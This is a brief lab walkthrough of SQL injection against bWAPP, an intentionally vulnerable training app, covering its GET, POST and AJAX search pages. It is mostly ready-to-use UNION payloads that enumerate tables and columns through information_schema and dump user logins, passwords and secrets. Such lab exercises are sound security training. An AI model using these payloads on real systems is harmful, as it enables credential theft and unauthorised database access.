SQL Injection with bWAPP

URL - http://192.168.31.112:8086

Go to SQL Injection (GET/Search)

Lets put ' see what happens

Lets try and use ' order by 6 -- -

Lets check if we have any users table in bWAPP using the below code

' and 1=0 union all select 1,table_schema,table_name,4,5,6,7 from information_schema.tables where table_schema != 'mysql' and table_schema != 'information_schema' -- -

We can see user table exists, Lets try and find the users.

' and 1=0 union all select 1,table_name, column_name,4,5,6,7 from information_schema.columns where table_schema != 'mysql' and table_schema != 'information_schema' and table_schema='bWAPP' and table_name='users' -- -

Now we have all we need to retrieve all users secrets

' and 1=0 union all select 1,login,password,secret,email,admin,7 from users-- -

SQL Injection (POST/Search)

Add the below query to the URL

Using this SQL query we can get all of table schema and names from information_schema.tables.

' and 1 = 0 union all select 1,table_schema,table_name,4,5,6,7 from information_schema.tables where 1=0 or 1=1-- '

Let's enter table name to query to get columns names of table like "Heroes Table"

' and 1=0 union all select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name = 'heroes' and table_schema = 'bwapp'-- '

SQL Injection (AJAX/JSON/jQuery)

we can find columns with ‘order by’ command. query: 'order by 7 -- -

Let check with 'order by 8 -- -

On order by 8, it was not appearing anything, so we can assume that it has only 7 columns.